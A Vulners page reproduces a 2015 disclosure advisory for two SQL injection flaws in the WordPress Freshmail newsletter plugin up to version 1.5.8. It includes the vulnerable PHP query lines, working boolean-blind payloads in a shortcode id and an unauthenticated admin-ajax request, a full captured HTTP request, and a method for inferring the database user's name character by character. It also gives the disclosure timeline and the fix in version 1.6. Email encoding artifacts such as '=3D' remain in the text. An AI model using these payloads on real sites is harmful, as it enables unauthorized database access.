Vulners
Lucene search
WordPress Freshmail 1.5.8 SQL Injection
`------------------------
ISSUE 1:
# Exploit Title: Unauthenticated SQL Injection on Wordpress Freshmail (#1)
# Google Dork: N/A
# Date: 05/05/2015
# Exploit Author: Felipe Molina de la Torre (@felmoltor)
# Vendor Homepage:
*http://freshmail.com/ <http://freshmail.com/> *
# Software Link:
*https://downloads.wordpress.org/plugin/freshmail-newsletter.latest-stable.zip
<https://downloads.wordpress.org/plugin/freshmail-newsletter.latest-stable.zip>*
# Version: <= 1.5.8, Communicated and Fixed by the Vendor in 1.6
# Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache
2.4.0 (Ubuntu)
# CVE : N/A
# Category: webapps
1. Summary
------------------
Freshmail plugin is an email marketing plugin for wordpress, allowing the
administrator to create mail campaigns and keep track of them.
There is a SQL Injection vulnerability available for collaborators (or
higher privileged users) for webs with freshmail plugin installed. The SQL
Injection in located in the attribute "id" of the inserted shortcode
[FM_form *id="N"*]. The shortcode attribute "id" is not sanitized before
inserting it in a SQL query.
A collaborator can insert shortcodes when he/she is editing a new post or
page and can preview the results (no administrator approval needed),
launching this SQL Injection.
2. Vulnerability timeline
----------------------------------
- 04/05/2015: Identified in version 1.5.8 and contact the developer company
by twitter.
- 05/05/2015: Send the details by mail to developer.
- 05/05/2015: Response from the developer.
- 06/05/2015: Fixed version in 1.6
3. Vulnerable code
---------------------------
Vulnerable File: include/shortcode.php, lines 27 and 120:
Line 19: function fm_form_func($atts)
[...]
Line 27: $form_value = $wpdb->get_row("select * from
".$wpdb->prefix.'fm_forms where form_id="'.$atts['id'].'";');
[...]
Line 120: add_shortcode('FM_form', 'fm_form_func');
3. Proof of concept
---------------------------
1. As collaborator, start a new post.
2. Insert the shortcode [FM_form id='1" and substr(user(),1,1)="b']
3. Click preview.
4. If the form is shown, the statement is true, if not, false.
POST /wp-admin/post.php HTTP/1.1
Host: <web>
Content-Length: 3979
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: <web>
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/43.0.2357.37 Safari/537.36
Content-Type: multipart/form-data;
boundary=----WebKitFormBoundary384PE6lRgBcOibkL
Referer: http://<web>/wp-admin/post.php?post=69&action=edit&message=8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8,es;q=0.6
Cookie: wordpress_f305[...]
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="_wpnonce"
0a75a3666b
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="_wp_http_referer"
/wp-admin/post.php?post=69&action=edit&message=8
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="user_ID"
4
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="action"
editpost
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="originalaction"
editpost
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="post_author"
4
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="post_type"
post
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="original_post_status"
pending
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="referredby"
http://<web>/wp-admin/post.php?post=69&action=edit&message=8
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="_wp_original_http_referer"
http://<web>/wp-admin/post.php?post=69&action=edit&message=8
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="post_ID"
69
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="meta-box-order-nonce"
f8aa04e508
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="closedpostboxesnonce"
ebf65a43ed
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="post_title"
Testing SQLi in shortcode
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="samplepermalinknonce"
e753a2d8f2
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="content"
[FM_form id='1" and substr(user(),1,1)="b]
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="wp-preview"
dopreview
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="original_publish"
Submit for Review
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="post_format"
0
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="post_category[]"
0
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="post_category[]"
1
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="tax_input[post_tag]"
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="newtag[post_tag]"
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="excerpt"
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="trackback_url"
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="metakeyselect"
#NONE#
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="metakeyinput"
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="metavalue"
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="_ajax_nonce-add-meta"
6a13a5a808
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="advanced_view"
1
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="comment_status"
open
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="ping_status"
open
------WebKitFormBoundary384PE6lRgBcOibkL--
5. Solution
---------------
Update to version 1.6
------------------------
ISSUE 2:
# Exploit Title: Unauthenticated SQL Injection on Wordpress Freshmail (#1)
# Google Dork: N/A
# Date: 05/05/2015
# Exploit Author: Felipe Molina de la Torre (@felmoltor)
# Vendor Homepage: *http://freshmail.com/ <http://freshmail.com/>
# Version: <=3D 1.5.8, Communicated and Fixed by the Vendor in 1.6
# Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache 2.4.0 (Ubuntu)
# CVE : N/A
# Category: webapps
1. Summary
------------------
Freshmail plugin is an email marketing plugin for wordpress, allowing the
administrator to create mail campaigns and keep track of them.
There is a unauthenticated SQL injection vulnerability in the "Subscribe to
our newsletter" formularies showed to the web visitors in the POST
parameter *fm_form_id. *
2. Vulnerability timeline
----------------------------------
- 04/05/2015: Identified in version 1.5.8 and contact the developer company
by twitter.
- 05/05/2015: Send the details by mail to developer.
- 05/05/2015: Response from the developer.
- 06/05/2015: Fixed version in 1.6
3. Vulnerable code
---------------------------
Vulnerable File: include/wp_ajax_fm_form.php, lines 44 and 50
[...]
Line 28: add_action('wp_ajax_fm_form', 'fm_form_ajax_func');
Line 29: add_action('wp_ajax_nopriv_fm_form', 'fm_form_ajax_func');
[...]
Line 44: $result =3D $_POST;
[...]
Line 50: $form =3D $wpdb->get_row('select * from '.$wpdb->prefix.'fm_forms
where form_id=3D"'.*$result['fm_form_id']*.'";');
[...]
3. Proof of concept
---------------------------
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: <web>
X-Requested-With: XMLHttpRequest
[...]
Cookie: wordpress_f30[...]
form%5Bemail%[email protected]&form%5Bimie%5D=3Dasdf&fm_form_id=3D1" and
"a"=3D"a&action=3Dfm_form&fm_form_referer=3D%2F
4. Explanation
---------------------
A page visitor can submit an email ([email protected]) to subscribe to the
formulary with fm_form_id=3D"1" and the JSON message received will be simil=
ar
to:
{"form":{"email":"[email protected]","imie":"asdf"},"fm_form_id":"*1*
","action":"fm_form","fm_form_referer":"\/?p=3D86","redirect":0,"status":"s=
uccess","message":"*Your
sign up request was successful! Please check your email inbox.*"}
The second time he tries to do the same with the same email the message
returned will be:
{"form":{"email":"[email protected]","imie":"asdf"},"fm_form_id":"*1*
","action":"fm_form","fm_form_referer":"\/?p=3D86","redirect":0,"status":"s=
uccess","message":"*Given
email address is already subscribed, thank you!*"}
If we insert *1**" and substr(user(),1,1)=3D"a *we'll receive either the sa=
me
message indicating that the Given email is already subscribed indicating
that the first character of the username is an "a" or a null message
indicating that the username first character is not an "a".
5. Solution
---------------
Update to version 1.6
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
07 May 2015 00:00Current
0.4Low risk
Vulners AI Score0.4